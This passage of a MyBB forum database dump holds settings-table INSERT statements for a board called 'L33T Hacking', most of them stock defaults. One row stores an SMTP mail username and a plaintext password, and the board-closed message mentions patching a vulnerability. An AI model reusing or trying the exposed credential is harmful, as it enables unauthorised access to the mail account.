'You can choose to only display users with at least the following amount of posts. A setting of 0 will show all users who have a birthday today.', 'text', '0', '7', '6', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('31', 'showwol', 'Show Who\'s Online?', 'Display the currently active users on the forum home page.', 'yesno', '1', '8', '6', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('32', 'showindexstats', 'Show Small Stats Section', 'Do you want to show the total number of threads, posts, members, and the last member on the forum home?', 'yesno', '1', '9', '6', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('33', 'showforumviewing', 'Show x viewing forum', 'Displays the currently active users viewing each forum.', 'yesno', '0', '10', '6', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('34', 'bbname', 'Board Name', 'The name of your message boards. We recommend that it is not over 75 characters.', 'text', 'L33T Hacking', '1', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('35', 'bburl', 'Board URL', 'The url to your forums.<br />Include the http://. Do NOT include a trailing slash.', 'text', 'http://l33thacking.net', '2', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('36', 'homename', 'Homepage Name', 'The name of your homepage. This will appear in the footer with a link to it.', 'text', 'L33T Hacking', '3', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('37', 'homeurl', 'Homepage URL', 'The full URL of your homepage. This will be linked to in the footer along with its name.', 'text', 'http://l33thacking.net', '4', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('38', 'adminemail', 'Admin Email', 'The administrator\'s email address. This will be used for outgoing emails sent via the forums.', 'text', 'support@l33thacking.net', '5', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('39', 'returnemail', 'Return Email', 'The email address for incoming replies to outgoing emails sent via the forums and is useful for no-reply accounts. Leave blank to use the admin email address instead.', 'text', '', '6', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('40', 'contactlink', 'Contact Us Link', 'This will be used for the Contact Us link on the bottom of all the forum pages. Can either be an email address (using mailto:email@website.com) or a hyperlink.', 'text', 'contact.php', '7', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('41', 'bblanguage', 'Default Language', 'The default language that MyBB should use for guests and for users without a selected language in their user control panel.', 'language', 'english', '8', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('42', 'cookiedomain', 'Cookie Domain', 'The domain which cookies should be set to. This can remain blank. It should also start with a . so it covers all subdomains.', 'text', '.l33thacking.net', '9', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('43', 'cookiepath', 'Cookie Path', 'The path which cookies are set to. We recommend setting this to the full directory path to your forums with a trailing slash.', 'text', '/', '10', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('44', 'cookieprefix', 'Cookie Prefix', 'A prefix to append to all cookies set by MyBB. This is useful if you wish to install multiple copies of MyBB on the one domain or have other software installed which conflicts with the names of the cookies in MyBB. If not specified, no prefix will be used.', 'text', '', '10', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('45', 'showvernum', 'Show Version Numbers', 'Allows you to turn off the public display of version numbers in MyBB.', 'onoff', '0', '11', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('46', 'captchaimage', 'CAPTCHA Images for Registration & Posting', 'To help prevent automated registrations and postings, you can choose a type of image verification for the user to complete. Please see the MyBB Wiki for more information on CAPTCHAs.', 'select 0=No CAPTCHA 1=MyBB Default CAPTCHA 2=reCAPTCHA', '1', '12', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('47', 'captchapublickey', 'reCAPTCHA Public Key', 'Your reCAPTCHA public key.', 'text', '', '14', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('48', 'captchaprivatekey', 'reCAPTCHA Private Key', 'Your reCAPTCHA private key.', 'text', '', '15', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('49', 'reportmethod', 'Reported Posts Medium', 'Please select from the list how you want reported posts to be dealt with. Storing them in the database is probably the better of the options listed.', 'radio db=Stored in the Database pms=Sent as Private Messages email=Sent via Email', 'db', '16', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('50', 'statslimit', 'Stats Limit', 'The number of threads to show on the stats page for most replies and most views.', 'text', '15', '17', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('51', 'decpoint', 'Decimal Point', 'The decimal point you use in your region.', 'text', '.', '18', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('52', 'thousandssep', 'Thousands Numeric Separator', 'The punctuation you want to use. For example, a setting of \',\' with the number 1200 will give you 1,200.', 'text', ',', '19', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('53', 'showlanguageselect', 'Show Language Selector in Footer', 'Set to no if you do not want to show the language selection area in the footer of all pages in the board.', 'yesno', '1', '20', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('54', 'maxmultipagelinks', 'Maximum Page Links in Pagination', 'Here you can set the number of next and previous page links to show in the pagination for threads or forums with more than one page of results.', 'text', '10', '21', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('55', 'mailingaddress', 'Mailing Address', 'If you have a mailing address, enter it here. This is shown on the COPPA compliance form.', 'textarea', 'support@l33thacking.net', '22', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('56', 'faxno', 'Contact Fax No', 'If you have a fax number, enter it here. This is shown on the COPPA compliance form.', 'text', '', '23', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('57', 'no_plugins', 'Disable All Plugins', 'Setting this to yes will disable all plugins without deactivating or uninstalling them. This is equivalent of manually defining NO_PLUGINS at the top of init.php.', 'yesno', '0', '24', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('58', 'username_method', 'Allowed Login Methods', 'The login methods you wish to allow for the username field. Username only, Email only, or allow both.', 'select 0=Username Only 1=Email Only 2=Both Username and Email', '0', '25', '7', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('59', 'mail_handler', 'Mail handler', 'The medium through which MyBB will send outgoing emails.', 'select mail=PHP mail smtp=SMTP mail', 'smtp', '1', '8', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('60', 'smtp_host', 'SMTP hostname', 'The hostname of the SMTP server through which mail should be sent.<br />Only required if SMTP Mail is selected as the Mail Handler.', 'text', 'mail.l33thacking.net', '2', '8', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('61', 'smtp_port', 'SMTP port', 'The port number of the SMTP server through which mail should be sent.<br />Only required if SMTP Mail is selected as the Mail Handler.', 'text', '587', '3', '8', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('62', 'smtp_user', 'SMTP username', 'The username used to authenticate with the SMTP server.<br />Only required if SMTP Mail is selected as the Mail Handler, and the SMTP server requires authentication.', 'text', 'staff+l33thacking.net', '4', '8', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('63', 'smtp_pass', 'SMTP password', 'The corresponding password used to authenticate with the SMTP server.<br />Only required if SMTP Mail is selected as the Mail Handler, and the SMTP server requires authentication.', 'passwordbox', 'flushing718', '5', '8', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('64', 'secure_smtp', 'SMTP Encryption Mode', 'Select the encryption required to communicate with the SMTP server.<br />Only required if SMTP Mail is selected as the Mail Handler.', 'select 0=No encryption 1=SSL encryption 2=TLS encryption', '0', '6', '8', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('65', 'mail_parameters', 'Additional Parameters for PHP\'s mail()', 'This setting allows you to set additional parameters for the PHP mail() function. Only used when \'PHP mail\' is selected as Mail Handler. <a href=\"http://php.net/function.mail\" target=\"_blank\">More information</a>', 'text', '', '7', '8', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('66', 'mail_logging', 'Mail Logging', 'This setting allows you to set how to log outgoing emails sent via the \'Send Thread to a Friend\' feature. In some countries it is illegal to log all content.', 'select 0=Disable email logging 1=Log emails without content 2=Log everything', '2', '8', '8', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('67', 'mail_message_id', 'Add message ID in mail headers', 'Disabling this option on some shared hosts resolves issues with forum emails being marked as spam.', 'yesno', '0', '9', '8', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('68', 'disableregs', 'Disable Registrations', 'Allows you to turn off the capability for users to register with one click.', 'yesno', '0', '1', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('69', 'regtype', 'Registration Method', 'Please select the method of registration to use when users register.', 'select instant=Instant Activation verify=Send Email Verification randompass=Send Random Password admin=Administrator Activation', 'verify', '2', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('70', 'minnamelength', 'Minimum Username Length', 'The minimum number of characters a username can be when a user registers.', 'text', '3', '3', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('71', 'maxnamelength', 'Maximum Username Length', 'The maximum number of characters a username can be when a user registers.', 'text', '20', '4', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('72', 'minpasswordlength', 'Minimum Password Length', 'The minimum number of characters a password should contain.', 'text', '4', '5', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('73', 'requirecomplexpasswords', 'Require a complex password?', 'Do you want users to use complex passwords? Complex passwords require an upper case letter, lower case letter and a number.', 'yesno', '0', '6', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('74', 'maxpasswordlength', 'Maximum Password Length', 'The maximum number of characters a password should contain.', 'text', '30', '7', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('75', 'customtitlemaxlength', 'Custom User Title Maximum Length', 'Maximum length a user can enter for the custom user title.', 'text', '40', '8', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('76', 'betweenregstime', 'Time Between Registrations', 'The amount of time (in hours) to disallow registrations for users who have already registered an account under the same ip address.', 'text', '24', '9', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('77', 'allowmultipleemails', 'Allow emails to be registered multiple times?', 'Select yes if you wish to allow users to sign up with the same email more than once otherwise select no.', 'yesno', '0', '10', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('78', 'maxregsbetweentime', 'Maximum Registrations Per IP Address', 'This option allows you to set the maximum amount of times a certain user can register within the timeframe specified above.', 'text', '2', '11', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('79', 'failedcaptchalogincount', 'Number of failed logins before verification required', 'The number of times to allow someone to attempt to login before required to enter a CAPTCHA verification. 0 to disable', 'text', '2', '12', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('80', 'failedlogincount', 'Number of times to allow failed logins', 'The number of times to allow someone to attempt to login. 0 to disable', 'text', '6', '13', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('81', 'failedlogintime', 'Time between failed logins', 'The amount of time (in minutes) before someone can try to login again, after they have failed to login the first time. Used if value above is not 0.', 'text', '15', '14', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('82', 'hiddencaptchaimage', 'Display a hidden CAPTCHA', 'Do you want to display a hidden CAPTCHA field when a user registers? This may prevent spambots from registering on your forum.', 'yesno', '1', '15', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('83', 'hiddencaptchaimagefield', 'Hidden CAPTCHA field', 'You can choose a name for your hidden CAPTCHA field below.', 'text', 'email3', '16', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('84', 'failedlogintext', 'Display number of failed logins', 'Do you wish to display a line of text telling the user how many more login attempts they have?', 'yesno', '1', '17', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('85', 'usereferrals', 'Use Referrals System', 'Do you want to use the user referrals system on these forums?', 'yesno', '1', '18', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('86', 'sigmycode', 'Allow MyCode in Signatures', 'Do you want to allow MyCode to be used in users\' signatures?', 'yesno', '1', '19', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('87', 'maxsigimages', 'Maximum Number of Images per Signature', 'Enter the maximum number of images (including smilies) a user can put in their signature. Set to 0 to disable images in signatures altogether.', 'text', '1', '20', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('88', 'sigsmilies', 'Allow Smilies in Signatures', 'Do you want to allow smilies to be used in users\' signatures?', 'yesno', '1', '21', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('89', 'sightml', 'Allow HTML in Signatures', 'Do you want to allow HTML to be used in users\' signatures?', 'yesno', '0', '22', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('90', 'sigimgcode', 'Allow [img] Code in Signatures', 'Do you want to allow [img] code to be used in users\' signatures?', 'yesno', '1', '23', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('91', 'siglength', 'Length limit in Signatures', 'The maximum number of characters a user can place in a signature.', 'text', '255', '24', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('92', 'sigcountmycode', 'MyCode affects signature length', 'Do you want MyCode to be counted as part of the limit when users use MyCode in their signature?', 'yesno', '1', '25', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('93', 'maxavatardims', 'Maximum Avatar Dimensions', 'The maximum dimensions that an avatar can be, in the format of width<b>x</b>height. If this is left blank then there will be no dimension restriction.', 'text', '120x150', '26', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('94', 'avatarsize', 'Max Uploaded Avatar Size', 'Maximum file size (in kilobytes) of uploaded avatars.', 'text', '80', '27', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('95', 'avatarresizing', 'Avatar Resizing Mode', 'If you wish to automatically resize all large avatars, provide users the option of resizing their avatar, or not resize avatars at all you can change this setting.', 'select auto=Automatically resize large avatars user=Give users the choice of resizing large avatars disabled=Disable this feature', 'user', '28', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('96', 'avatardir', 'Avatar Directory', 'The directory where your avatars are stored. These are used in the avatar list in the User CP.', 'text', 'images/avatars', '29', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('97', 'avataruploadpath', 'Avatar Upload Path', 'This is the path where custom avatars will be uploaded to. This directory <b>must be chmod 777</b> (writable) for uploads to work.', 'text', './uploads/avatars', '30', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('98', 'emailkeep', 'Users Keep Email', 'If a current user has an email already registered in your banned list, should they be allowed to keep it?', 'yesno', '0', '31', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('99', 'coppa', 'COPPA Compliance', 'If you wish to enable <a href=\"http://www.coppa.org/comply.htm\">COPPA</a> support on your forums, please select the registration allowance below.', 'select enabled=Enabled deny=Deny users under the age of 13 disabled=Disable this feature', 'deny', '32', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('100', 'allowaway', 'Allow Away Statuses?', 'Should users be allowed to set their status to \'Away\' with a custom reason & return date?', 'yesno', '1', '33', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('101', 'allowbuddyonly', 'Allow Buddy-Only Messaging?', 'Allow users to send private messages only to people on their buddy list?', 'yesno', '0', '34', '9', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('102', 'enablememberlist', 'Enable Member List Functionality', 'If you wish to disable the member list on your board, set this option to no.', 'yesno', '1', '1', '10', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('103', 'membersperpage', 'Members Per Page', 'The number of members to show per page on the member list.', 'text', '20', '2', '10', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('104', 'default_memberlist_sortby', 'Default Sort Field', 'Select the field that you want members to be sorted by default.', 'select regdate=Registration Date postnum=Post Count username=Username lastvisit=Last Visit', 'regdate', '3', '10', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('105', 'default_memberlist_order', 'Default Sort Order', 'Select the order that you want members to be sorted by default.<br />Ascending: A-Z / beginning-end<br />Descending: Z-A / end-beginning', 'select ascending=Ascending descending=Descending', 'ascending', '4', '10', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('106', 'memberlistmaxavatarsize', 'Maximum Display Avatar Dimensions', 'The maximum dimensions for avatars when being displayed in the member list. If an avatar is too large, it will automatically be scaled down.', 'text', '70x70', '5', '10', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('107', 'boardclosed', 'Board Closed', 'If you need to close your forums to make some changes or perform an upgrade, this is the global switch. Viewers will not be able to view your forums, however, they will see a message with the reason you specify below. Administrators will still be able to view the forums.', 'yesno', '0', '1', '11', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('108', 'boardclosed_reason', 'Board Closed Reason', 'If your forum is closed, you can set a message here that your visitors will be able to see when they visit your forums.', 'textarea', 'L33T Hacking will be offline for the next 20 hours due to some security updates. We are working on patching a vulnerability - T3h Jok3r ', '2', '11', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('109', 'portal_announcementsfid', 'Forum ID to pull announcements from', 'Please enter the forum ids (fid) of the forum(s) you wish to pull the announcements from. Separate them with a comma (,).', 'text', '0', '1', '12', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('110', 'portal_numannouncements', 'Number of announcements to show', 'Please enter the number of announcements to show on the main page.', 'text', '0', '2', '12', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('111', 'portal_showwelcome', 'Show the Welcome box', 'Do you want to show the welcome box to visitors / users.', 'yesno', '0', '3', '12', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('112', 'portal_showpms', 'Show the number of PMs to users', 'Do you want to show the number of private messages the current user has in their pm system.', 'yesno', '0', '4', '12', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('113', 'portal_showstats', 'Show forum statistics', 'Do you want to show the total number of posts, threads, members and the last registered member on the portal page?', 'yesno', '0', '5', '12', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('114', 'portal_showwol', 'Show Who\'s Online', 'Do you want to show the \'Who\'s online\' information to users when they visit the portal page?', 'yesno', '0', '6', '12', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('115', 'portal_showsearch', 'Show Search Box', 'Do you want to show the search box, allowing users to quickly search the forums on the portal?', 'yesno', '0', '7', '12', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('116', 'portal_showdiscussions', 'Show Latest Discussions', 'Do you wish to show the current forum discussions on the portal page?', 'yesno', '0', '8', '12', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('117', 'portal_showdiscussionsnum', 'Number of latest discussions to show', 'Please enter the number of current forum discussions to show on the portal page.', 'text', '0', '9', '12', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('118', 'minmessagelength', 'Minimum Message Length', 'The minimum number of characters to post.', 'text', '25', '1', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('119', 'maxmessagelength', 'Maximum Message Length', 'The maximum number of characters (bytes) to allow in a message. A setting of 0 allows an unlimited length. <br />This should correlate with the message column type in the posts database table, and adjust accordingly. Below are the maximum lengths for each column type. <ul> <li>TEXT: 65535 (default)</li> <li>MEDIUMTEXT: 16777215</li> <li>LONGTEXT: 4294967295</li> </ul>', 'text', '65535', '2', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('120', 'maxposts', 'Maximum Posts Per Day', 'This is the total number of posts allowed per user per day. 0 for unlimited.', 'text', '0', '3', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('121', 'postfloodcheck', 'Post Flood Checking', 'Set to on if you want to enable flood checking for posts. Specify the time between posts below.', 'onoff', '1', '4', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('122', 'postfloodsecs', 'Post Flood Time', 'Set the time (in seconds) users have to wait between posting, to be in effect; the option above must be on.', 'text', '25', '5', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('123', 'postmergemins', 'Post Merge Time', 'With this enabled, posts posted within x minutes by the same author right after each other, will be merged. Set the time limit (in minutes) to merge posts. Set to 0 or leave blank to disable this feature. Default: 60', 'text', '1440', '6', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('124', 'postmergefignore', 'Merge Forums to Ignore', 'Forums, separated by a comma, to exclude from the auto merge feature. Leave blank to disable.', 'text', '3, 49, 50, 11, 23, 33', '7', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('125', 'postmergeuignore', 'Merge User Groups to Ignore', 'Usergroups, separated by a comma, to exclude from the merge feature. Default: 4 (Administrator). Leave blank to disable.', 'text', '4', '8', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('126', 'postmergesep', 'Merge Separator', 'The Separator to be used when merging two message Default: \'[hr]\'', 'text', '[hr]', '9', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('127', 'logip', 'Log Posting IP Addresses', 'Do you wish to log ip addresses of users who post, and who you want to show ip addresses to?', 'radio no=Do not log IP hide=Show to Admins & Mods show=Show to all Users', 'hide', '10', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('128', 'showeditedby', 'Show \'edited by\' Messages', 'Once a post is edited by a regular user, do you want to show the edited by message?', 'yesno', '1', '11', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('129', 'showeditedbyadmin', 'Show \'edited by\' Message for Forum Staff', 'Do you want to show edited by messages for forum staff when they edit their posts?', 'yesno', '1', '12', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('130', 'maxpostimages', 'Maximum Images per Post', 'Enter the maximum number of images (including smilies) a user can put in their post. Set to 0 to disable this.', 'text', '15', '13', '13', '1'); 